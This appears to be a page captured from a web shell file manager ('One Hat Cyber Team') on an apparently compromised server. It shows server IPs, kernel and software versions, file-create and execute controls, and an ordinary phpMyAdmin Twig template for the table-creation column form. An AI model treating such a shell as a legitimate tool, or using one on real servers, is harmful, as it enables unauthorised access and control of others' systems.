⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.148
Server IP:
104.21.92.153
Server:
Linux mpgrup.4286.w4261.php8 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
pma
/
templates
/
columns_definitions
/
View File Name :
column_definitions_form.twig
{{ Url_getHiddenInputs(form_params) }} {# happens when an index has been set on a column #} {# and a column is added to the table creation dialog #} {# This contains a JSON-encoded string #}
{% if action == 'tbl_create.php' %}
{% trans 'Table name' %}:
{% trans 'Add' %}
{% trans 'column(s)' %}
{% endif %} {% if content_cells is iterable %} {% include 'columns_definitions/table_fields_definitions.twig' with { 'is_backup': is_backup, 'fields_meta': fields_meta, 'mimework': mimework, 'content_cells': content_cells, 'change_column': change_column, 'is_virtual_columns_supported': is_virtual_columns_supported, 'browse_mime': browse_mime, 'server_type': server_type, 'max_rows': max_rows, 'char_editing': char_editing, 'attribute_types': attribute_types, 'privs_available': privs_available, 'max_length': max_length, 'dbi': dbi, 'disable_is': disable_is } only %} {% endif %} {% if action == 'tbl_create.php' %}
{% trans 'Table comments:' %}
{% trans 'Collation:' %}
{% trans 'Storage Engine:' %} {{ Util_showMySQLDocu('Storage_engines') }}
{% trans 'Connection:' %} {{ Util_showMySQLDocu('federated-create-connection') }}
{{ Charsets_getCollationDropdownBox( dbi, disable_is, 'tbl_collation', null, tbl_collation, false ) }}
{{ StorageEngine_getHtmlSelect( 'tbl_storage_engine', null, tbl_storage_engine ) }}
{% if have_partitioning %}
{% trans 'PARTITION definition:' %} {{ Util_showMySQLDocu('Partitioning') }}
{% include 'columns_definitions/partitions.twig' with { 'partition_details': partition_details } only %}
{% endif %}
{% endif %}